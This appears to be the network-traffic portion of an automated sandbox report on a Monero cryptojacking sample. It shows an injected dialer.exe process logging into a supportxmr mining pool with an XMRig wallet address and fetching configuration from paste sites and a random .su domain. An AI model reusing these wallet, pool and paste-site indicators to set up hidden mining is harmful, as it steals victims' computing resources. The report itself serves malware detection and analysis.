                                                        Oct 10, 2024 04:56:13.519293070 CEST49760443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:56:13.700867891 CEST44349760188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:56:13.701220989 CEST44349760188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:56:13.701353073 CEST49760443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:56:13.722997904 CEST49760443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:56:13.723037004 CEST44349760188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:56:20.537184000 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:56:20.597420931 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:56:32.056132078 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:56:32.191191912 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:56:43.685673952 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:56:43.894296885 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:56:59.078685999 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:56:59.285118103 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:57:07.496706963 CEST65331443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:57:07.496798992 CEST44365331188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:57:07.497081041 CEST65331443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:57:07.507170916 CEST65331443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:57:07.507245064 CEST44365331188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:57:07.973392963 CEST44365331188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:57:07.974749088 CEST65331443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:57:07.974811077 CEST44365331188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:57:07.978797913 CEST44365331188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:57:07.979082108 CEST65331443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:57:07.980671883 CEST65331443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:57:07.980843067 CEST44365331188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:57:07.981044054 CEST65331443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:57:07.981105089 CEST44365331188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:57:08.037571907 CEST65331443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:57:08.272869110 CEST44365331188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:57:08.273112059 CEST44365331188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:57:08.273430109 CEST65331443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:57:08.301243067 CEST65331443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:57:08.301243067 CEST65331443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:57:08.301311970 CEST44365331188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:57:09.148890972 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:57:09.285152912 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:57:19.184792995 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:57:19.284917116 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:57:38.590034962 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:57:38.784949064 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:57:55.833451986 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:57:55.894325972 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:58:07.457417965 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:58:07.597558022 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:58:13.833112955 CEST65333443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:58:13.833226919 CEST44365333188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:58:13.833337069 CEST65333443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:58:13.835948944 CEST65333443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:58:13.835988998 CEST44365333188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:58:14.295286894 CEST44365333188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:58:14.297399998 CEST65333443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:58:14.297440052 CEST44365333188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:58:14.300668955 CEST44365333188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:58:14.300790071 CEST65333443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:58:14.302176952 CEST65333443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:58:14.302262068 CEST44365333188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:58:14.302452087 CEST65333443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:58:14.302469969 CEST44365333188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:58:14.347418070 CEST65333443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:58:14.573539972 CEST44365333188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:58:14.573662043 CEST44365333188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:58:14.576139927 CEST65333443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:58:14.582097054 CEST65333443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:58:14.582133055 CEST44365333188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:58:14.582165956 CEST65333443192.168.2.6188.114.97.3

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 10, 2024 04:56:07.950720072 CEST6121453192.168.2.61.1.1.1
                                                        Oct 10, 2024 04:56:07.960619926 CEST53612141.1.1.1192.168.2.6
                                                        Oct 10, 2024 04:56:09.071942091 CEST6258853192.168.2.61.1.1.1
                                                        Oct 10, 2024 04:56:09.080779076 CEST53625881.1.1.1192.168.2.6
                                                        Oct 10, 2024 04:56:09.881417036 CEST5855253192.168.2.61.1.1.1
                                                        Oct 10, 2024 04:56:09.892271996 CEST53585521.1.1.1192.168.2.6
                                                        Oct 10, 2024 04:56:11.799189091 CEST6297553192.168.2.61.1.1.1
                                                        Oct 10, 2024 04:56:11.808322906 CEST53629751.1.1.1192.168.2.6
                                                        Oct 10, 2024 04:56:12.760461092 CEST6540053192.168.2.61.1.1.1
                                                        Oct 10, 2024 04:56:12.941441059 CEST53654001.1.1.1192.168.2.6
                                                        Oct 10, 2024 04:56:40.747997999 CEST5361257162.159.36.2192.168.2.6
                                                        Oct 10, 2024 04:56:41.221302032 CEST53557011.1.1.1192.168.2.6

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Oct 10, 2024 04:56:07.950720072 CEST192.168.2.61.1.1.10x486dStandard query (0)pool.supportxmr.comA (IP address)IN (0x0001)false
                                                        Oct 10, 2024 04:56:09.071942091 CEST192.168.2.61.1.1.10x1c55Standard query (0)rentry.coA (IP address)IN (0x0001)false
                                                        Oct 10, 2024 04:56:09.881417036 CEST192.168.2.61.1.1.10x4903Standard query (0)justpaste.itA (IP address)IN (0x0001)false
                                                        Oct 10, 2024 04:56:11.799189091 CEST192.168.2.61.1.1.10x9a3aStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                        Oct 10, 2024 04:56:12.760461092 CEST192.168.2.61.1.1.10xf149Standard query (0)jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.suA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Oct 10, 2024 04:56:07.960619926 CEST1.1.1.1192.168.2.60x486dNo error (0)pool.supportxmr.compool-fr.supportxmr.comCNAME (Canonical name)IN (0x0001)false
                                                        Oct 10, 2024 04:56:07.960619926 CEST1.1.1.1192.168.2.60x486dNo error (0)pool-fr.supportxmr.com141.94.96.71A (IP address)IN (0x0001)false
                                                        Oct 10, 2024 04:56:07.960619926 CEST1.1.1.1192.168.2.60x486dNo error (0)pool-fr.supportxmr.com141.94.96.144A (IP address)IN (0x0001)false
                                                        Oct 10, 2024 04:56:07.960619926 CEST1.1.1.1192.168.2.60x486dNo error (0)pool-fr.supportxmr.com141.94.96.195A (IP address)IN (0x0001)false
                                                        Oct 10, 2024 04:56:09.080779076 CEST1.1.1.1192.168.2.60x1c55No error (0)rentry.co104.26.3.16A (IP address)IN (0x0001)false
                                                        Oct 10, 2024 04:56:09.080779076 CEST1.1.1.1192.168.2.60x1c55No error (0)rentry.co104.26.2.16A (IP address)IN (0x0001)false
                                                        Oct 10, 2024 04:56:09.080779076 CEST1.1.1.1192.168.2.60x1c55No error (0)rentry.co172.67.75.40A (IP address)IN (0x0001)false
                                                        Oct 10, 2024 04:56:09.892271996 CEST1.1.1.1192.168.2.60x4903No error (0)justpaste.it83.168.108.45A (IP address)IN (0x0001)false
                                                        Oct 10, 2024 04:56:11.808322906 CEST1.1.1.1192.168.2.60x9a3aNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                        Oct 10, 2024 04:56:11.808322906 CEST1.1.1.1192.168.2.60x9a3aNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                        Oct 10, 2024 04:56:11.808322906 CEST1.1.1.1192.168.2.60x9a3aNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                        Oct 10, 2024 04:56:12.941441059 CEST1.1.1.1192.168.2.60xf149No error (0)jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su188.114.97.3A (IP address)IN (0x0001)false
                                                        Oct 10, 2024 04:56:12.941441059 CEST1.1.1.1192.168.2.60xf149No error (0)jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su188.114.96.3A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • rentry.co
                                                        • justpaste.it
                                                        • pastebin.com
                                                        • jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.649728141.94.96.1444432248C:\Windows\System32\dialer.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-10 02:56:08 UTC577OUTData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 36 69 51 61 33 6e 4d 66 6b 45 47 37 4d 46 73 46 59 79 6a 73 62 37 43 4a 4a 71 57 51 6e 6b 74 74 47 33 66 51 4d 5a 51 52 61 6a 78 38 55 70 61 58 72 54 7a 47 4b 6e 50 7a 4d 52 6a 69 45 39 65 4d 61 62 41 67 75 35 33 6f 66 55 70 78 41 44 79 55 77 74 69 77 4d 41 5a 43 5a 44 67 36 69 77 22 2c 22 70 61 73 73 22 3a 22 32 33 32 33 32 33 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 32 31 2e 33 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 38 2e 30 20 6d 73 76 63 2f 32 30 32 32 22 2c 22 72 69 67 69 64
                                                        Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"46iQa3nMfkEG7MFsFYyjsb7CJJqWQnkttG3fQMZQRajx8UpaXrTzGKnPzMRjiE9eMabAgu53ofUpxADyUwtiwMAZCZDg6iw","pass":"232323","agent":"XMRig/6.21.3 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/2022","rigid
                                                        2024-10-10 02:56:08 UTC539INData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 63 63 30 31 34 62 35 34 2d 37 63 33 31 2d 34 32 64 64 2d 61 32 31 35 2d 33 65 64 64 66 38 61 64 32 63 61 63 22 2c 22 6a 6f 62 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 65 38 34 39 64 62 38 30 36 30 30 31 65 35 65 64 30 33 34 63 65 66 66 36 62 61 33 34 65 35 37 65 36 38 39 30 64 31 34 39 64 34 64 31 65 36 37 33 34 64 36 64 64 36 63 36 65 33 61 30 66 33 36 64 62 66 63 32 34 39 66 33 38 30 30 30 30 30 30 30 30 66 38 37 38 30 62 64 38 65 36 38 35 63 31 30 32 66 64 61 39 35 31 39 33 63 39 36 34 61 33 32 61 66 32 33 37 38 30 39 38 35 33 32 34 66 61 31 30 66 32 38 61 39 39 61 30 35 33 64 34 35 62 31
                                                        Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"cc014b54-7c31-42dd-a215-3eddf8ad2cac","job":{"blob":"1010be849db806001e5ed034ceff6ba34e57e6890d149d4d1e6734d6dd6c6e3a0f36dbfc249f3800000000f8780bd8e685c102fda95193c964a32af23780985324fa10f28a99a053d45b1
                                                        2024-10-10 02:56:10 UTC420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 61 38 34 39 64 62 38 30 36 30 30 31 65 35 65 64 30 33 34 63 65 66 66 36 62 61 33 34 65 35 37 65 36 38 39 30 64 31 34 39 64 34 64 31 65 36 37 33 34 64 36 64 64 36 63 36 65 33 61 30 66 33 36 64 62 66 63 32 34 39 66 33 38 30 30 30 30 30 30 30 30 65 31 32 35 65 37 63 62 63 33 62 61 32 38 38 34 33 64 64 32 33 62 34 38 63 31 35 30 64 37 64 61 37 64 31 66 30 66 66 39 61 32 37 64 61 32 33 36 36 66 62 34 37 34 61 63 34 30 62 31 37 62 34 37 30 34 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 64 77 58 6d 57 6e 67 4e 34 66 6e 35 55 72 6a 74 74 58 55 70 74 4c 77 52 4d 49 52 47 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010ca849db806001e5ed034ceff6ba34e57e6890d149d4d1e6734d6dd6c6e3a0f36dbfc249f3800000000e125e7cbc3ba28843dd23b48c150d7da7d1f0ff9a27da2366fb474ac40b17b4704","job_id":"dwXmWngN4fn5UrjttXUptLwRMIRG","target":"8
                                                        2024-10-10 02:56:20 UTC420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 34 38 34 39 64 62 38 30 36 30 30 31 65 35 65 64 30 33 34 63 65 66 66 36 62 61 33 34 65 35 37 65 36 38 39 30 64 31 34 39 64 34 64 31 65 36 37 33 34 64 36 64 64 36 63 36 65 33 61 30 66 33 36 64 62 66 63 32 34 39 66 33 38 30 30 30 30 30 30 30 30 38 31 39 63 34 32 35 61 36 64 32 65 65 32 64 39 39 63 35 64 34 35 37 35 30 66 37 31 65 37 62 31 33 38 30 65 31 64 39 66 35 34 61 36 63 34 32 66 30 36 32 36 64 39 62 35 34 66 66 33 66 66 62 65 30 37 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 66 72 74 4f 52 30 44 2f 66 4b 57 56 69 2b 70 53 37 72 72 50 4d 50 66 39 62 73 6c 56 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010d4849db806001e5ed034ceff6ba34e57e6890d149d4d1e6734d6dd6c6e3a0f36dbfc249f3800000000819c425a6d2ee2d99c5d45750f71e7b1380e1d9f54a6c42f0626d9b54ff3ffbe07","job_id":"frtOR0D/fKWVi+pS7rrPMPf9bslV","target":"8
                                                        2024-10-10 02:56:32 UTC420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 66 38 34 39 64 62 38 30 36 30 30 31 65 35 65 64 30 33 34 63 65 66 66 36 62 61 33 34 65 35 37 65 36 38 39 30 64 31 34 39 64 34 64 31 65 36 37 33 34 64 36 64 64 36 63 36 65 33 61 30 66 33 36 64 62 66 63 32 34 39 66 33 38 30 30 30 30 30 30 30 30 65 63 34 32 33 61 66 66 39 34 66 35 34 62 65 62 31 32 32 30 30 62 66 66 61 34 65 62 37 66 39 36 38 37 34 31 39 38 63 32 34 37 33 35 62 62 33 32 34 63 33 61 63 63 65 36 37 37 37 64 34 30 65 30 30 38 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 2b 6e 55 2f 4f 6a 66 6f 53 43 37 41 77 31 67 48 77 44 4b 49 69 71 33 2f 70 2f 77 35 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010df849db806001e5ed034ceff6ba34e57e6890d149d4d1e6734d6dd6c6e3a0f36dbfc249f3800000000ec423aff94f54beb12200bffa4eb7f96874198c24735bb324c3acce6777d40e008","job_id":"+nU/OjfoSC7Aw1gHwDKIiq3/p/w5","target":"8
                                                        2024-10-10 02:56:43 UTC420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 62 38 34 39 64 62 38 30 36 30 30 31 65 35 65 64 30 33 34 63 65 66 66 36 62 61 33 34 65 35 37 65 36 38 39 30 64 31 34 39 64 34 64 31 65 36 37 33 34 64 36 64 64 36 63 36 65 33 61 30 66 33 36 64 62 66 63 32 34 39 66 33 38 30 30 30 30 30 30 30 30 62 32 36 66 66 62 66 35 32 34 64 63 62 36 39 37 62 64 66 32 61 36 63 64 35 64 64 63 62 31 36 32 30 34 36 39 31 37 62 62 62 64 30 36 32 33 61 30 34 37 39 31 61 62 34 35 31 65 63 63 64 64 66 31 30 62 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 30 4a 50 4f 6c 38 62 30 66 4b 4c 70 35 49 38 4c 6d 6f 45 77 2f 54 45 79 51 52 46 6b 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010eb849db806001e5ed034ceff6ba34e57e6890d149d4d1e6734d6dd6c6e3a0f36dbfc249f3800000000b26ffbf524dcb697bdf2a6cd5ddcb162046917bbbd0623a04791ab451eccddf10b","job_id":"0JPOl8b0fKLp5I8LmoEw/TEyQRFk","target":"8
                                                        2024-10-10 02:56:59 UTC420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 61 38 34 39 64 62 38 30 36 30 30 31 65 35 65 64 30 33 34 63 65 66 66 36 62 61 33 34 65 35 37 65 36 38 39 30 64 31 34 39 64 34 64 31 65 36 37 33 34 64 36 64 64 36 63 36 65 33 61 30 66 33 36 64 62 66 63 32 34 39 66 33 38 30 30 30 30 30 30 30 30 32 65 35 65 62 34 30 65 30 36 65 30 33 33 33 36 61 30 37 37 33 32 33 66 61 33 37 66 64 31 34 35 37 34 31 32 64 33 34 35 33 33 64 30 65 36 37 33 32 66 30 66 34 33 62 35 37 65 63 30 63 62 61 33 30 64 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 6d 43 54 63 68 33 68 43 33 5a 7a 38 34 61 33 6e 79 4f 71 4a 55 6b 38 4d 41 38 56 69 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010fa849db806001e5ed034ceff6ba34e57e6890d149d4d1e6734d6dd6c6e3a0f36dbfc249f38000000002e5eb40e06e03336a077323fa37fd1457412d34533d0e6732f0f43b57ec0cba30d","job_id":"mCTch3hC3Zz84a3nyOqJUk8MA8Vi","target":"8
                                                        2024-10-10 02:57:09 UTC420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 34 38 35 39 64 62 38 30 36 30 30 31 65 35 65 64 30 33 34 63 65 66 66 36 62 61 33 34 65 35 37 65 36 38 39 30 64 31 34 39 64 34 64 31 65 36 37 33 34 64 36 64 64 36 63 36 65 33 61 30 66 33 36 64 62 66 63 32 34 39 66 33 38 30 30 30 30 30 30 30 30 39 63 37 61 64 61 62 31 62 64 37 31 31 61 66 65 30 36 39 61 36 35 31 63 62 64 32 38 39 39 30 62 65 63 31 39 32 30 66 65 61 32 31 31 66 66 39 39 35 37 32 30 33 64 66 63 64 66 38 39 64 37 64 31 30 66 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 46 4e 6a 45 44 54 76 49 76 77 77 78 61 41 47 54 54 4b 48 56 63 57 57 36 72 64 55 65 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101084859db806001e5ed034ceff6ba34e57e6890d149d4d1e6734d6dd6c6e3a0f36dbfc249f38000000009c7adab1bd711afe069a651cbd28990bec1920fea211ff9957203dfcdf89d7d10f","job_id":"FNjEDTvIvwwxaAGTTKHVcWW6rdUe","target":"8
                                                        2024-10-10 02:57:19 UTC420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 65 38 35 39 64 62 38 30 36 30 30 31 65 35 65 64 30 33 34 63 65 66 66 36 62 61 33 34 65 35 37 65 36 38 39 30 64 31 34 39 64 34 64 31 65 36 37 33 34 64 36 64 64 36 63 36 65 33 61 30 66 33 36 64 62 66 63 32 34 39 66 33 38 30 30 30 30 30 30 30 30 66 66 66 66 37 61 39 35 36 35 37 65 31 31 31 33 64 36 34 64 38 61 38 32 65 36 37 38 39 36 33 64 32 36 37 38 66 63 66 63 36 30 63 39 35 63 35 61 30 30 63 66 63 36 64 35 37 65 65 38 33 32 33 30 31 30 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 4e 51 76 41 35 61 30 2f 56 62 6a 46 2b 6e 30 4b 5a 43 74 53 74 35 51 48 52 72 59 4e 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"10108e859db806001e5ed034ceff6ba34e57e6890d149d4d1e6734d6dd6c6e3a0f36dbfc249f3800000000ffff7a95657e1113d64d8a82e678963d2678fcfc60c95c5a00cfc6d57ee8323010","job_id":"NQvA5a0/VbjF+n0KZCtSt5QHRrYN","target":"8
                                                        2024-10-10 02:57:38 UTC420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 32 38 35 39 64 62 38 30 36 30 30 31 65 35 65 64 30 33 34 63 65 66 66 36 62 61 33 34 65 35 37 65 36 38 39 30 64 31 34 39 64 34 64 31 65 36 37 33 34 64 36 64 64 36 63 36 65 33 61 30 66 33 36 64 62 66 63 32 34 39 66 33 38 30 30 30 30 30 30 30 30 39 61 61 33 61 63 33 33 62 66 62 38 34 30 61 32 37 32 65 37 62 31 62 66 66 64 31 31 36 34 37 65 34 66 36 33 39 35 39 34 38 31 30 62 37 38 63 63 30 65 61 30 30 38 62 36 39 39 35 31 37 32 31 32 31 31 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 73 61 62 37 31 7a 5a 47 47 6e 41 6e 57 6f 4f 5a 69 2b 34 32 42 74 67 32 37 4c 2b 75 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a2859db806001e5ed034ceff6ba34e57e6890d149d4d1e6734d6dd6c6e3a0f36dbfc249f38000000009aa3ac33bfb840a272e7b1bffd11647e4f639594810b78cc0ea008b69951721211","job_id":"sab71zZGGnAnWoOZi+42Btg27L+u","target":"8


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.649734104.26.3.164432248C:\Windows\System32\dialer.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-10 02:56:09 UTC111OUTGET /5apf98os/raw HTTP/1.1
                                                        Accept: */*
                                                        Connection: close
                                                        Host: rentry.co
                                                        User-Agent: cpp-httplib/0.12.6
                                                        2024-10-10 02:56:09 UTC694INHTTP/1.1 200 OK
                                                        Date: Thu, 10 Oct 2024 02:56:09 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Content-Length: 10
                                                        Connection: close
                                                        vary: Origin
                                                        x-xss-protection: 1; mode=block
                                                        x-content-type-options: nosniff
                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                        Cache-Control: Vary
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d2Z81unQGS1IlDhuqFAIW7xGslCFdySImWnjkcxKYiHAzzRff0qqYlm3mJHfyuicYcq11hxH1k7E3tptldNbT%2FSfrX3wxuZGxcN0NutFqGWwNSiGnBouB%2FvCOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8d0355ec3d3515c3-EWR
                                                        2024-10-10 02:56:09 UTC10INData Raw: 52 45 42 4f 52 4e 20 58 4d 52
                                                        Data Ascii: REBORN XMR


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.64974083.168.108.454432248C:\Windows\System32\dialer.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-10 02:56:10 UTC107OUTGET /f86v1 HTTP/1.1
                                                        Accept: */*
                                                        Connection: close
                                                        Host: justpaste.it
                                                        User-Agent: cpp-httplib/0.12.6
                                                        2024-10-10 02:56:11 UTC1007INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Thu, 10 Oct 2024 02:56:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: max-age=0, must-revalidate, private
                                                        Accept-CH: sec-ch-ua, sec-ch-ua-bitness, sec-ch-ua-arch, sec-ch-ua-platform, sec-ch-ua-platform-version, sec-ch-ua-form-factors, sec-ch-ua-full-version-list, sec-ch-ua-mobile, sec-ch-ua-model
                                                        pragma: no-cache
                                                        Expires: Thu, 10 Oct 2024 02:56:11 GMT
                                                        Set-Cookie: userData=RTrbz8p0ij_E0N6CsdH8m3Ye310kyYUg3aYq489yt8ZOcaH0bYfSXFm6V64WYIBYbL6t3VCWkM0CoyLf72_hB4ezsiJL8_gGR7JRNW9N-oVJHyjta26GIwn4qztDcAt40M71HDc51g4aVniFTshyqCHVDLahWH5D8Fm3BN1H1Gc0EJKlvzxpqGL5rSqGfAmAGj7SRiKurw%3D%3D; expires=Wed, 10 Oct 2029 02:56:11 GMT; Max-Age=157766400; path=/; domain=.justpaste.it; secure; httponly; samesite=lax
                                                        X-Frame-Options: DENY
                                                        X-Content-Type-Options: nosniff
                                                        Referrer-Policy: origin-when-cross-origin
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
